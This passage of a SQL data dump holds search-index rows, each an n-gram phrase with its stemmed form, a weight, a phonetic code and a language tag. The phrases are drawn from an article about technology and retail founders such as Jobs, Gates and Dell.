game',0,1,1.2667,'D250',1,'en'),(41582,'day game for','dai game for',0,1,1.4,'D2516',1,'en'),(41583,'day operations','dai operations',0,1,1.4667,'D16352',1,'en'),(41584,'day operations to','dai operations to',0,1,1.5667,'D163523',1,'en'),(41585,'day to','dai to',0,1,1.2,'D000',1,'en'),(41586,'day to day','dai to day',0,1,1.3333,'D000',1,'en'),(41587,'deal with google','deal with google',0,1,1.5333,'D4324',1,'en'),(41588,'dean','dean',0,0,0.2667,'D500',1,'en'),(41589,'dean of','dean of',0,1,1.2333,'D510',1,'en'),(41590,'dean of executive','dean of executive',0,1,1.5667,'D51231',1,'en'),(41591,'dell','dell',0,0,0.2667,'D400',1,'en'),(41592,'dell at','dell at',0,1,1.2333,'D430',1,'en'),(41593,'dell at dell','dell at dell',0,1,1.4,'D434',1,'en'),(41594,'dell inc','dell inc',0,1,1.2667,'D452',1,'en'),(41595,'dell inc who','dell inc who',0,1,1.4,'D452',1,'en'),(41596,'dell is','dell is',0,1,1.2333,'D420',1,'en'),(41597,'dell is spinning','dell is spinning',0,1,1.5333,'D42152',1,'en'),(41598,'den','den',0,0,0.2,'D500',1,'en'),(41599,'den with','den with',0,1,1.2667,'D530',1,'en'),(41600,'den with a','den with a',0,1,1.3333,'D530',1,'en'),(41601,'design details','design details',0,1,1.4667,'D25342',1,'en'),(41602,'design details to','design details to',0,1,1.5667,'D253423',1,'en'),(41603,'desk','desk',0,0,0.2667,'D200',1,'en'),(41604,'desk and','desk and',0,1,1.2667,'D253',1,'en'),(41605,'desk and in','desk and in',0,1,1.3667,'D2535',1,'en'),(41606,'details to','detail to',0,1,1.3333,'D423',1,'en'),(41607,'details to make','detail to make',0,1,1.5,'D42352',1,'en'),(41608,'developed small','develop small',0,1,1.5,'D1413254',1,'en'),(41609,'developed small screen','develop small screen',0,1,1.7333,'D1413254265',1,'en'),(41610,'devices invented','devic invented',0,1,1.5333,'D125153',1,'en'),(41611,'devices invented during','devic invented during',0,1,1.7667,'D125153652',1,'en'),(41612,'devices long','devic long',0,1,1.4,'D12452',1,'en'),(41613,'devices long before','devic long before',0,1,1.6333,'D1245216',1,'en'),(41614,'devices which','devic which',0,1,1.4333,'D120',1,'en'),(41615,'devices which at','devic which at',0,1,1.5333,'D123',1,'en'),(41616,'devote','devot',0,0,0.4,'D130',1,'en'),(41617,'devote long','devot long',0,1,1.3667,'D13452',1,'en'),(41618,'devote long to','devot long to',0,1,1.4667,'D134523',1,'en'),(41619,'did with','did with',0,1,1.2667,'D000',1,'en'),(41620,'did with via','did with via',0,1,1.4,'D100',1,'en'),(41621,'didn\'t devote','didn devote',0,1,1.4333,'D5313',1,'en'),(41622,'didn\'t devote long','didn devote long',0,1,1.6,'D5313452',1,'en'),(41623,'died','di',0,0,0.2667,'D000',2,'en'),(41624,'died jobs','di jobs',0,1,1.3,'D212',1,'en'),(41625,'died jobs returned','di jobs returned',0,1,1.6,'D21263653',1,'en'),(41626,'different comes','differ comes',0,1,1.5,'D1653252',1,'en'),(41627,'different comes near','differ comes near',0,1,1.6667,'D165325256',1,'en'),(41628,'director and','director and',0,1,1.4,'D623653',1,'en'),(41629,'director and work','director and work',0,1,1.5667,'D62365362',1,'en'),(41630,'director at','director at',0,1,1.3667,'D62363',1,'en'),(41631,'director at shoe','director at shoe',0,1,1.5333,'D623632',1,'en'),(41632,'distance','distanc',0,0,0.5333,'D2352',1,'en'),(41633,'distance as','distanc as',0,1,1.3667,'D2352',1,'en'),(41634,'distance as its','distanc as its',0,1,1.5,'D235232',1,'en'),(41635,'do next','do next',0,1,1.2333,'D523',1,'en'),(41636,'do next facts','do next facts',0,1,1.4333,'D5231232',1,'en'),(41637,'do the steve','do the steve',0,1,1.4,'D231',1,'en'),(41638,'dollar brand','dollar brand',0,1,1.4,'D461653',1,'en'),(41639,'dollar brand just','dollar brand just',0,1,1.5667,'D46165323',1,'en'),(41640,'driver','driver',0,0,0.4,'D616',1,'en'),(41641,'driver of','driver of',0,1,1.3,'D6161',1,'en'),(41642,'driver of abroad','driver of abroad',0,1,1.5333,'D616163',1,'en'),(41643,'dsw','dsw',0,0,0.2,'D200',1,'en'),(41644,'dsw inc','dsw inc',0,1,1.2333,'D252',1,'en'),(41645,'dsw inc the','dsw inc the',0,1,1.3667,'D2523',1,'en'),(41646,'durant','durant',0,0,0.4,'D653',1,'en'),(41647,'durant made','durant made',0,1,1.3667,'D65353',1,'en'),(41648,'durant made such','durant made such',0,1,1.5333,'D653532',1,'en'),(41649,'during','dure',0,0,0.4,'D652',2,'en'),(41650,'during his','dure his',0,1,1.3333,'D652',1,'en'),(41651,'during his second','dure his second',0,1,1.5667,'D65253',1,'en'),(41652,'early','earli',0,0,0.3333,'E640',2,'en'),(41653,'early 1900s','earli 1900s',0,1,1.3667,'E642',1,'en'),(41654,'early 1900s billy','earli 1900s billy',0,1,1.5667,'E64214',1,'en'),(41655,'early stages','earli stages',0,1,1.4,'E64232',1,'en'),(41656,'early stages he','earli stages he',0,1,1.5,'E64232',1,'en'),(41657,'earth\'s','earth',0,0,0.4667,'E632',1,'en'),(41658,'earth\'s largest','earth largest',0,1,1.5,'E6324623',1,'en'),(41659,'earth\'s largest coffee','earth largest coffee',0,1,1.7333,'E632462321',1,'en'),(41660,'earth\'s largest software','earth largest software',0,1,1.8,'E63246232136',1,'en'),(41661,'easy to use','easi to use',0,1,1.3667,'E232',1,'en'),(41662,'education','educ',0,0,0.6,'E3235',1,'en'),(41663,'education at','educ at',0,1,1.4,'E32353',1,'en'),(41664,'education at babson','educ at babson',0,1,1.6333,'E32353125',1,'en'),(41665,'effective technology','effect technology',0,1,1.6667,'E123132542',1,'en'),(41666,'effective technology concern','effect technology concern',0,1,1.9333,'E1231325425265',1,'en'),(41667,'efforts to use','effort to use',0,1,1.4667,'E163232',1,'en'),(41668,'efforts with','effort with',0,1,1.4,'E16323',1,'en'),(41669,'efforts with a','effort with a',0,1,1.4667,'E16323',1,'en'),(41670,'eisenman','eisenman',0,0,0.5333,'E250',1,'en'),(41671,'eisenman dean','eisenman dean',0,1,1.4333,'E2535',1,'en'),(41672,'eisenman dean of','eisenman dean of',0,1,1.5333,'E25351',1,'en'),(41673,'elaine','elain',0,0,0.4,'E450',1,'en'),(41674,'elaine eisenman','elain eisenman',0,1,1.5,'E4525',1,'en'),(41675,'elaine eisenman dean','elain eisenman dean',0,1,1.6667,'E452535',1,'en'),(41676,'entrance','entranc',0,0,0.5333,'E53652',1,'en'),(41677,'entrance left','entranc left',0,1,1.4333,'E53652413',1,'en'),(41678,'entrance left theceojob','entranc left theceojob',0,1,1.7667,'E5365241321',1,'en'),(41679,'entrepreneurs','entrepreneur',0,0,0.8667,'E53616562',1,'en'),(41680,'entrepreneurs from','entrepreneur from',0,1,1.6,'E53616562165',1,'en'),(41681,'entrepreneurs from ken','entrepreneur from ken',0,1,1.7333,'E5361656216525',1,'en'),(41682,'epoch','epoch',0,0,0.3333,'E120',1,'en'),(41683,'epoch retailing','epoch retailing',0,1,1.5,'E1263452',1,'en'),(41684,'epoch retailing if','epoch retailing if',0,1,1.6,'E12634521',1,'en'),(41685,'eric','eric',0,0,0.2667,'E620',1,'en'),(41686,'eric dell','eric dell',0,1,1.3,'E6234',1,'en'),(41687,'eric dell at','eric dell at',0,1,1.4,'E62343',1,'en'),(41688,'established windows','establish windows',0,1,1.6333,'E231423532',1,'en'),(41689,'established windows and','establish windows and',0,1,1.7667,'E23142353253',1,'en'),(41690,'even dating','even dating',0,1,1.3667,'E15352',1,'en'),(41691,'even dating back','even dating back',0,1,1.5333,'E1535212',1,'en'),(41692,'even if','even if',0,1,1.2333,'E151',1,'en'),(41693,'even if he','even if he',0,1,1.3333,'E151',1,'en'),(41694,'every den','everi den',0,1,1.3,'E1635',1,'en'),(41695,'every den with','everi den with',0,1,1.4667,'E16353',1,'en'),(41696,'every desk','everi desk',0,1,1.3333,'E1632',1,'en'),(41697,'every desk and','everi desk and',0,1,1.4667,'E163253',1,'en'),(41698,'every jobs','everi jobs',0,1,1.3333,'E16212',1,'en'),(41699,'every jobs who','everi jobs who',0,1,1.4667,'E16212',1,'en'),(41700,'example gates','exampl gates',0,1,1.4333,'E2514232',1,'en'),(41701,'example gates jobs','exampl gates jobs',0,1,1.6,'E251423212',1,'en'),(41702,'executive and','execut and',0,1,1.4333,'E23153',1,'en'),(41703,'executive and internet','execut and internet',0,1,1.7333,'E2315353653',1,'en'),(41704,'explored','explor',0,0,0.5333,'E21463',1,'en'),(41705,'explored buying','explor buying',0,1,1.5,'E21463152',1,'en'),(41706,'explored buying the','explor buying the',0,1,1.6333,'E214631523',1,'en'),(41707,'facts change','fact change',0,1,1.4,'F23252',1,'en'),(41708,'facts change ibm','fact change ibm',0,1,1.5333,'F2325215',1,'en'),(41709,'failed','fail',0,0,0.4,'F430',1,'en'),(41710,'failed to','fail to',0,1,1.3,'F430',1,'en'),(41711,'failed to give','fail to give',0,1,1.4667,'F4321',1,'en'),(41712,'failing','fail',0,0,0.4667,'F452',1,'en'),(41713,'failing to','fail to',0,1,1.3333,'F4523',1,'en'),(41714,'family distance','famili distance',0,1,1.5,'F5432352',1,'en'),(41715,'family distance as','famili distance as',0,1,1.6,'F5432352',1,'en'),(41716,'famously','famous',0,0,0.5333,'F524',1,'en'),(41717,'famously attentive','famous attentive',0,1,1.6,'F5243531',1,'en'),(41718,'famously attentive to','famous attentive to',0,1,1.7,'F52435313',1,'en'),(41719,'faq','faq',0,0,0.2,'F200',1,'en'),(41720,'fight','fight',0,0,0.3333,'F230',1,'en'),(41721,'fight it','fight it',0,1,1.2667,'F230',1,'en'),(41722,'fight it out','fight it out',0,1,1.4,'F230',1,'en'),(41723,'figure out','figur out',0,1,1.3333,'F263',1,'en'),(41724,'figure out what','figur out what',0,1,1.5,'F263',1,'en'),(41725,'filo in','filo in',0,1,1.2333,'F450',1,'en'),(41726,'filo in 1995','filo in 1995',0,1,1.4,'F450',1,'en'),(41727,'financial officer','financi officer',0,1,1.5667,'F524126',1,'en'),(41728,'financial officer to','financi officer to',0,1,1.6667,'F5241263',1,'en'),(41729,'financial partner','financi partner',0,1,1.5667,'F52416356',1,'en'),(41730,'financial partner took','financi partner took',0,1,1.7333,'F5241635632',1,'en'),(41731,'fix what','fix what',0,1,1.2667,'F230',1,'en'),(41732,'fix what they','fix what they',0,1,1.4333,'F230',1,'en'),(41733,'fledgling','fledgl',0,0,0.6,'F432452',1,'en'),(41734,'fledgling pc','fledgl pc',0,1,1.4,'F43245212',1,'en'),(41735,'fledgling pc in','fledgl pc in',0,1,1.5,'F432452125',1,'en'),(41736,'focus on','focu on',0,1,1.2667,'F250',1,'en'),(41737,'focus on what','focu on what',0,1,1.4333,'F253',1,'en'),(41738,'focused on apple','focus on apple',0,1,1.5333,'F23514',1,'en'),(41739,'for a long','for a long',0,1,1.3333,'F6452',1,'en'),(41740,'for a unified','for a unified',0,1,1.4333,'F6513',1,'en'),(41741,'for each','for each',0,1,1.2667,'F620',1,'en'),(41742,'for each and','for each and',0,1,1.4,'F6253',1,'en'),(41743,'for most','for most',0,1,1.2667,'F6523',1,'en'),(41744,'for most individuals','for most individuals',0,1,1.6667,'F6523531342',1,'en'),(41745,'for ms','for ms',0,1,1.2,'F652',1,'en'),(41746,'for ms nobody','for ms nobody',0,1,1.4333,'F652513',1,'en'),(41747,'for spurning','for spurning',0,1,1.4,'F621652',1,'en'),(41748,'for spurning a','for spurning a',0,1,1.4667,'F621652',1,'en'),(41749,'for survival','for survival',0,1,1.4,'F62614',1,'en'),(41750,'for survival and','for survival and',0,1,1.5333,'F6261453',1,'en'),(41751,'for the fledgling','for the fledgling',0,1,1.5667,'F631432452',1,'en'),(41752,'forced','forc',0,0,0.4,'F623',1,'en'),(41753,'forced for','forc for',0,1,1.3333,'F62316',1,'en'),(41754,'forced for spurning','forc for spurning',0,1,1.6333,'F6231621652',1,'en'),(41755,'forced out','forc out',0,1,1.3333,'F623',1,'en'),(41756,'forced out twice','forc out twice',0,1,1.5333,'F6232',1,'en'),(41757,'founder comes','founder comes',0,1,1.4333,'F536252',1,'en'),(41758,'founder comes back','founder comes back',0,1,1.6,'F53625212',1,'en'),(41759,'founder confronts','founder confronts',0,1,1.5667,'F5362516532',1,'en'),(41760,'founder confronts a','founder confronts a',0,1,1.6333,'F5362516532',1,'en'),(41761,'founder explored','founder explored',0,1,1.5333,'F53621463',1,'en'),(41762,'founder explored buying','founder explored buying',0,1,1.7667,'F53621463152',1,'en'),(41763,'founder has','founder has',0,1,1.3667,'F5362',1,'en'),(41764,'founder has also','founder has also',0,1,1.5333,'F536242',1,'en'),(41765,'founder of','founder of',0,1,1.3333,'F5361',1,'en'),(41766,'founder of earth\'s','founder of earth',0,1,1.6,'F5361632',1,'en'),(41767,'founders','founder',0,0,0.5333,'F5362',1,'en'),(41768,'founders never','founder never',0,1,1.4667,'F5362516',1,'en'),(41769,'founders never leave','founder never leave',0,1,1.6667,'F536251641',1,'en'),(41770,'free movies','free movies',0,1,1.3667,'F6512',1,'en'),(41771,'free movies and','free movies and',0,1,1.5,'F651253',1,'en'),(41772,'friends took','friend took',0,1,1.4,'F653232',1,'en'),(41773,'friends took different','friend took different',0,1,1.7333,'F65323231653',1,'en'),(41774,'from a','from a',0,1,1.2,'F650',2,'en'),(41775,'from a member','from a member',0,1,1.4333,'F6516',1,'en'),(41776,'from ken','from ken',0,1,1.2667,'F6525',1,'en'),(41777,'from ken jobs','from ken jobs',0,1,1.4333,'F6525212',1,'en'),(41778,'from microsoft','from microsoft',0,1,1.4667,'F6526213',1,'en'),(41779,'from microsoft and','from microsoft and',0,1,1.6,'F652621353',1,'en'),(41780,'future and','futur and',0,1,1.3333,'F3653',1,'en'),(41781,'future and they','futur and they',0,1,1.5,'F3653',1,'en'),(41782,'future two','futur two',0,1,1.3333,'F363',1,'en'),(41783,'future two long','futur two long',0,1,1.5,'F363452',1,'en'),(41784,'game for','game for',0,1,1.2667,'G516',1,'en'),(41785,'game for a','game for a',0,1,1.3333,'G516',1,'en'),(41786,'gates','gate',0,0,0.3333,'G320',1,'en'),(41787,'gates achieved','gate achieved',0,1,1.4667,'G3213',1,'en'),(41788,'gates achieved his','gate achieved his',0,1,1.6,'G32132',1,'en'),(41789,'gates as','gate as',0,1,1.2667,'G320',1,'en'),(41790,'gates as chairman','gate as chairman',0,1,1.5667,'G3265',1,'en'),(41791,'gates comes','gate comes',0,1,1.3667,'G3252',1,'en'),(41792,'gates comes up','gate comes up',0,1,1.4667,'G32521',1,'en'),(41793,'gates is','gate is',0,1,1.2667,'G320',1,'en'),(41794,'gates is hoping','gate is hoping',0,1,1.5,'G32152',1,'en'),(41795,'gates is that','gate is that',0,1,1.4333,'G323',1,'en'),(41796,'gates is the','gate is the',0,1,1.4,'G323',1,'en'),(41797,'gates jobs','gate jobs',0,1,1.3333,'G3212',1,'en'),(41798,'gates jobs didn\'t','gate jobs didn',0,1,1.5667,'G3212353',1,'en'),(41799,'gates joins','gate joins',0,1,1.3667,'G3252',1,'en'),(41800,'gates joins a','gate joins a',0,1,1.4333,'G3252',1,'en'),(41801,'gates to','gate to',0,1,1.2667,'G323',1,'en'),(41802,'gates to play','gate to play',0,1,1.4333,'G32314',1,'en'),(41803,'gates will','gate will',0,1,1.3333,'G324',1,'en'),(41804,'gates will be','gate will be',0,1,1.4333,'G3241',1,'en'),(41805,'gates will stay','gate will stay',0,1,1.5,'G32423',1,'en'),(41806,'gateways','gatewai',0,0,0.5333,'G320',1,'en'),(41807,'gateways and','gatewai and',0,1,1.4,'G3253',1,'en'),(41808,'gateways and jobs','gatewai and jobs',0,1,1.5667,'G3253212',1,'en'),(41809,'ge','ge',0,0,0.1333,'G000',1,'en'),(41810,'ge were','ge were',0,1,1.2333,'G600',1,'en'),(41811,'ge were an','ge were an',0,1,1.3333,'G650',1,'en'),(41812,'give the iphone','give the iphone',0,1,1.5,'G1315',1,'en'),(41813,'goal to','goal to',0,1,1.2333,'G430',1,'en'),(41814,'goal to put','goal to put',0,1,1.3667,'G4313',1,'en'),(41815,'good agent','good agent',0,1,1.3333,'G3253',1,'en'),(41816,'good agent to','good agent to',0,1,1.4333,'G3253',1,'en'),(41817,'good looking','good looking',0,1,1.4,'G34252',1,'en'),(41818,'good looking and','good looking and',0,1,1.5333,'G3425253',1,'en'),(41819,'google in','googl in',0,1,1.3,'G450',1,'en'),(41820,'google in the','googl in the',0,1,1.4333,'G453',1,'en'),(41821,'google inc','googl inc',0,1,1.3333,'G452',1,'en'),(41822,'google inc he','googl inc he',0,1,1.4333,'G452',1,'en'),(41823,'goverment','gover',0,0,0.6,'G1653',1,'en'),(41824,'goverment ordered','gover ordered',0,1,1.5667,'G16536363',1,'en'),(41825,'goverment ordered breakup','gover ordered breakup',0,1,1.8333,'G165363631621',1,'en'),(41826,'great site','great site',0,1,1.3333,'G6323',1,'en'),(41827,'great site davis','great site davis',0,1,1.5333,'G632312',1,'en'),(41828,'group','group',0,0,0.3333,'G610',2,'en'),(41829,'group that','group that',0,1,1.3333,'G613',1,'en'),(41830,'group that developed','group that developed',0,1,1.6667,'G6131413',1,'en'),(41831,'grow','grow',0,0,0.2667,'G600',1,'en'),(41832,'grow from','grow from',0,1,1.3,'G6165',1,'en'),(41833,'grow from a','grow from a',0,1,1.3667,'G6165',1,'en'),(41834,'growth schultz','growth schultz',0,1,1.4667,'G632432',1,'en'),(41835,'growth schultz who','growth schultz who',0,1,1.6,'G632432',1,'en'),(41836,'growth slowed','growth slowed',0,1,1.4333,'G63243',1,'en'),(41837,'growth slowed mike','growth slowed mike',0,1,1.6,'G6324352',1,'en'),(41838,'had less','had less',0,1,1.2667,'H342',1,'en'),(41839,'had less than','had less than',0,1,1.4333,'H34235',1,'en'),(41840,'had lost','had lost',0,1,1.2667,'H3423',1,'en'),(41841,'had lost 60','had lost 60',0,1,1.3667,'H3423',1,'en'),(41842,'handed','hand',0,0,0.4,'H530',1,'en'),(41843,'handed over','hand over',0,1,1.3667,'H5316',1,'en'),(41844,'handed over day','hand over day',0,1,1.5,'H53163',1,'en'),(41845,'happen','happen',0,0,0.4,'H150',1,'en'),(41846,'happen when','happen when',0,1,1.3667,'H150',1,'en'),(41847,'happen when a','happen when a',0,1,1.4333,'H150',1,'en'),(41848,'happy in','happi in',0,1,1.2667,'H150',1,'en'),(41849,'happy in the','happi in the',0,1,1.4,'H153',1,'en'),(41850,'hardware software','hardwar software',0,1,1.5667,'H6362136',1,'en'),(41851,'hardware software and','hardwar software and',0,1,1.7,'H636213653',1,'en'),(41852,'has also','ha also',0,1,1.2667,'H242',1,'en'),(41853,'has also been','ha also been',0,1,1.4333,'H24215',1,'en'),(41854,'has predicted','ha predicted',0,1,1.4333,'H216323',1,'en'),(41855,'has predicted via','ha predicted via',0,1,1.5667,'H2163231',1,'en'),(41856,'hash','hash',0,0,0.2667,'H200',1,'en'),(41857,'hash of','hash of',0,1,1.2333,'H210',1,'en'),(41858,'hash of things','hash of things',0,1,1.4667,'H21352',1,'en'),(41859,'have been rivals','have been rivals',0,1,1.5333,'H156142',1,'en'),(41860,'have left','have left',0,1,1.3,'H1413',1,'en'),(41861,'have left his','have left his',0,1,1.4333,'H14132',1,'en'),(41862,'having moved','have moved',0,1,1.4,'H152513',1,'en'),(41863,'having moved aside','have moved aside',0,1,1.6,'H15251323',1,'en'),(41864,'having trouble','have trouble',0,1,1.4667,'H1523614',1,'en'),(41865,'having trouble keeping','have trouble keeping',0,1,1.7333,'H15236142152',1,'en'),(41866,'he accelerated','he accelerated',0,1,1.4667,'H2463',1,'en'),(41867,'he accelerated a','he accelerated a',0,1,1.5333,'H2463',1,'en'),(41868,'he and','he and',0,1,1.2,'H530',1,'en'),(41869,'he and a','he and a',0,1,1.2667,'H530',1,'en'),(41870,'he becameceoin','he becameceoin',0,1,1.4667,'H12525',1,'en'),(41871,'he becameceoin 2007','he becameceoin 2007',0,1,1.6333,'H12525',1,'en'),(41872,'he built','he built',0,1,1.2667,'H143',1,'en'),(41873,'he built a','he built a',0,1,1.3333,'H143',1,'en'),(41874,'he built universal','he built universal',0,1,1.6,'H14351624',1,'en'),(41875,'he calls','he calls',0,1,1.2667,'H242',1,'en'),(41876,'he calls next','he calls next',0,1,1.4333,'H242523',1,'en'),(41877,'he died','he died',0,1,1.2333,'H300',2,'en'),(41878,'he died jobs','he died jobs',0,1,1.4,'H3212',1,'en'),(41879,'he loses','he loses',0,1,1.2667,'H420',1,'en'),(41880,'he loses board','he loses board',0,1,1.4667,'H42163',1,'en'),(41881,'he missed','he missed',0,1,1.3,'H523',1,'en'),(41882,'he missed the','he missed the',0,1,1.4333,'H523',1,'en'),(41883,'he oversaw','he oversaw',0,1,1.3333,'H162',1,'en'),(41884,'he oversaw the','he oversaw the',0,1,1.4667,'H1623',1,'en'),(41885,'he realizes','he realizes',0,1,1.3667,'H642',1,'en'),(41886,'he realizes davis','he realizes davis',0,1,1.5667,'H642312',1,'en'),(41887,'he said he','he said he',0,1,1.3333,'H230',1,'en'),(41888,'he was not','he was not',0,1,1.3333,'H253',1,'en'),(41889,'he was ousted','he was ousted',0,1,1.4333,'H230',1,'en'),(41890,'he was part','he was part',0,1,1.3667,'H2163',1,'en'),(41891,'he was prepared','he was prepared',0,1,1.5,'H216163',1,'en'),(41892,'he was windows','he was windows',0,1,1.4667,'H2532',1,'en'),(41893,'he went','he went',0,1,1.2333,'H530',1,'en'),(41894,'he went back','he went back',0,1,1.4,'H5312',1,'en'),(41895,'he\'d','he',0,0,0.2667,'H300',1,'en'),(41896,'he\'d quit','he quit',0,1,1.3,'H323',1,'en'),(41897,'he\'d quit being','he quit being',0,1,1.5,'H323152',1,'en'),(41898,'he\'s said','he said',0,1,1.3,'H230',1,'en'),(41899,'he\'s said his','he said his',0,1,1.4333,'H232',1,'en'),(41900,'help it','help it',0,1,1.2333,'H413',1,'en'),(41901,'help it recapture','help it recapture',0,1,1.5667,'H41362136',1,'en'),(41902,'here to','here to',0,1,1.2333,'H630',1,'en'),(41903,'here to continue','here to continue',0,1,1.5333,'H632535',1,'en'),(41904,'him overstaying','him overstaying',0,1,1.5,'H5162352',1,'en'),(41905,'him overstaying his','him overstaying his',0,1,1.6333,'H5162352',1,'en'),(41906,'his after','hi after',0,1,1.3,'H2136',1,'en'),(41907,'his after he','hi after he',0,1,1.4,'H2136',1,'en'),(41908,'his cell','hi cell',0,1,1.2667,'H240',1,'en'),(41909,'his cell phone','hi cell phone',0,1,1.4667,'H2415',1,'en'),(41910,'his chief','hi chief',0,1,1.3,'H210',1,'en'),(41911,'his chief financial','hi chief financial',0,1,1.6333,'H21524',1,'en'),(41912,'his corporate','hi corporate',0,1,1.4333,'H26163',1,'en'),(41913,'his corporate creation','hi corporate creation',0,1,1.7333,'H261632635',1,'en'),(41914,'his initial','hi initial',0,1,1.3667,'H2534',1,'en'),(41915,'his initial goal','hi initial goal',0,1,1.5333,'H253424',1,'en'),(41916,'his namesake','hi namesake',0,1,1.4,'H252',1,'en'),(41917,'his namesake company','hi namesake company',0,1,1.6667,'H252515',1,'en'),(41918,'his philanthropic','hi philanthropic',0,1,1.5667,'H21453612',1,'en'),(41919,'his philanthropic work','hi philanthropic work',0,1,1.7333,'H2145361262',1,'en'),(41920,'his second','hi second',0,1,1.3333,'H253',1,'en'),(41921,'his second reign','hi second reign',0,1,1.5333,'H253625',1,'en'),(41922,'his time','hi time',0,1,1.2667,'H235',1,'en'),(41923,'his time really','hi time really',0,1,1.5,'H23564',1,'en'),(41924,'his watch','hi watch',0,1,1.3,'H232',1,'en'),(41925,'his watch that','hi watch that',0,1,1.4667,'H2323',1,'en'),(41926,'his welcome','hi welcome',0,1,1.3667,'H2425',1,'en'),(41927,'his welcome referred','hi welcome referred',0,1,1.6667,'H24256163',1,'en'),(41928,'hold dsw','hold dsw',0,1,1.2667,'H432',1,'en'),(41929,'hold dsw inc','hold dsw inc',0,1,1.4,'H43252',1,'en'),(41930,'hope','hope',0,0,0.2667,'H100',2,'en'),(41931,'hope is','hope is',0,1,1.2333,'H120',1,'en'),(41932,'hope is that','hope is that',0,1,1.4,'H123',1,'en'),(41933,'hoping','hope',0,0,0.4,'H152',1,'en'),(41934,'hoping do','hope do',0,1,1.3,'H1523',1,'en'),(41935,'hoping do the','hope do the',0,1,1.4333,'H1523',1,'en'),(41936,'ibm','ibm',0,0,0.2,'I150',1,'en'),(41937,'ibm used','ibm used',0,1,1.2667,'I1523',1,'en'),(41938,'ibm used to','ibm used to',0,1,1.3667,'I1523',1,'en'),(41939,'if gates','if gates',0,1,1.2667,'I1232',1,'en'),(41940,'if gates comes','if gates comes',0,1,1.4667,'I123252',1,'en'),(41941,'if he','if he',0,1,1.1667,'I100',1,'en'),(41942,'if he loses','if he loses',0,1,1.3667,'I142',1,'en'),(41943,'if the source','if the source',0,1,1.4333,'I13262',1,'en'),(41944,'illustration','illustr',0,0,0.8,'I423635',1,'en'),(41945,'illustration of','illustr of',0,1,1.5,'I4236351',1,'en'),(41946,'illustration of this','illustr of this',0,1,1.6667,'I423635132',1,'en'),(41947,'impeded','imped',0,0,0.4667,'I513',1,'en'),(41948,'impeded alien','imped alien',0,1,1.4333,'I51345',1,'en'),(41949,'impeded alien life','imped alien life',0,1,1.6,'I5134541',1,'en'),(41950,'in 1975','in 1975',0,1,1.2333,'I500',1,'en'),(41951,'in 1975 yet','in 1975 yet',0,1,1.3667,'I530',1,'en'),(41952,'in 1981','in 1981',0,1,1.2333,'I500',1,'en'),(41953,'in 1981 and','in 1981 and',0,1,1.3667,'I530',1,'en'),(41954,'in 1995','in 1995',0,1,1.2333,'I500',1,'en'),(41955,'in 1995 and','in 1995 and',0,1,1.3667,'I530',1,'en'),(41956,'in 1997','in 1997',0,1,1.2333,'I500',1,'en'),(41957,'in 1997 after','in 1997 after',0,1,1.4333,'I5136',1,'en'),(41958,'in 2000','in 2000',0,1,1.2333,'I500',1,'en'),(41959,'in 2000 microsoft','in 2000 microsoft',0,1,1.5667,'I526213',1,'en'),(41960,'in 2007','in 2007',0,1,1.2333,'I500',1,'en'),(41961,'in 2007 when','in 2007 when',0,1,1.4,'I500',1,'en'),(41962,'in every den','in every den',0,1,1.4,'I51635',1,'en'),(41963,'in service','in service',0,1,1.3333,'I52612',1,'en'),(41964,'in service at','in service at',0,1,1.4333,'I526123',1,'en'),(41965,'in the early','in the early',0,1,1.4,'I5364',1,'en'),(41966,'in the future','in the future',0,1,1.4333,'I53136',1,'en'),(41967,'in wellesley','in wellesley',0,1,1.4,'I5424',1,'en'),(41968,'in wellesley boston','in wellesley boston',0,1,1.6333,'I54241235',1,'en'),(41969,'in world','in world',0,1,1.2667,'I5643',1,'en'),(41970,'in world wide','in world wide',0,1,1.4333,'I5643',1,'en'),(41971,'inc','inc',0,0,0.2,'I520',1,'en'),(41972,'inc chairman','inc chairman',0,1,1.4,'I5265',1,'en'),(41973,'inc chairman impeded','inc chairman impeded',0,1,1.6667,'I526513',1,'en'),(41974,'inc he','inc he',0,1,1.2,'I520',1,'en'),(41975,'inc he said','inc he said',0,1,1.3667,'I523',1,'en'),(41976,'inc the','inc the',0,1,1.2333,'I523',1,'en'),(41977,'inc the smart','inc the smart',0,1,1.4333,'I5232563',1,'en'),(41978,'inc to','inc to',0,1,1.2,'I523',1,'en'),(41979,'inc to eric','inc to eric',0,1,1.3667,'I52362',1,'en'),(41980,'inc who','inc who',0,1,1.2333,'I520',1,'en'),(41981,'inc who threw','inc who threw',0,1,1.4333,'I5236',1,'en'),(41982,'include smartphones','includ smartphones',0,1,1.6333,'I52432563152',1,'en'),(41983,'include smartphones and','includ smartphones and',0,1,1.7667,'I5243256315253',1,'en'),(41984,'indispensable','indispens',0,0,0.8667,'I53215214',1,'en'),(41985,'indispensable to','indispens to',0,1,1.5333,'I532152143',1,'en'),(41986,'indispensable to companies','indispens to companies',0,1,1.8667,'I53215214325152',1,'en'),(41987,'individuals jobs','individu jobs',0,1,1.5333,'I53134212',1,'en'),(41988,'individuals jobs was','individu jobs was',0,1,1.6667,'I53134212',1,'en'),(41989,'initial goal','initi goal',0,1,1.4,'I53424',1,'en'),(41990,'initial goal to','initi goal to',0,1,1.5,'I534243',1,'en'),(41991,'innovation','innov',0,0,0.6667,'I5135',1,'en'),(41992,'innovation and','innov and',0,1,1.4667,'I51353',1,'en'),(41993,'innovation and invention','innov and invention',0,1,1.8,'I5135351535',1,'en'),(41994,'insider','insid',0,0,0.4667,'I5236',1,'en'),(41995,'insider satya','insid satya',0,1,1.4333,'I523623',1,'en'),(41996,'insider satya nadella','insid satya nadella',0,1,1.7,'I523623534',1,'en'),(41997,'instant coffee','instant coffee',0,1,1.4667,'I5235321',1,'en'),(41998,'instant coffee now','instant coffee now',0,1,1.6,'I52353215',1,'en'),(41999,'internet business','internet business',0,1,1.5667,'I536531252',1,'en'),(42000,'internet business education','internet business education',0,1,1.9,'I5365312523235',1,'en'),(42001,'internet marketing','internet marketing',0,1,1.6,'I53653562352',1,'en'),(42002,'internet marketing deal','internet marketing deal',0,1,1.7667,'I5365356235234',1,'en'),(42003,'into a supplier','into a supplier',0,1,1.5,'I532146',1,'en'),(42004,'into trying','into trying',0,1,1.3667,'I53652',1,'en'),(42005,'into trying to','into trying to',0,1,1.4667,'I536523',1,'en'),(42006,'introduced','introduc',0,0,0.6667,'I536323',2,'en'),(42007,'introduced the','introduc the',0,1,1.4667,'I536323',1,'en'),(42008,'introduced the via','introduc the via',0,1,1.6,'I5363231',1,'en'),(42009,'invented','invent',0,0,0.5333,'I5153',1,'en'),(42010,'invented during','invent during',0,1,1.5,'I5153652',1,'en'),(42011,'invented during his','invent during 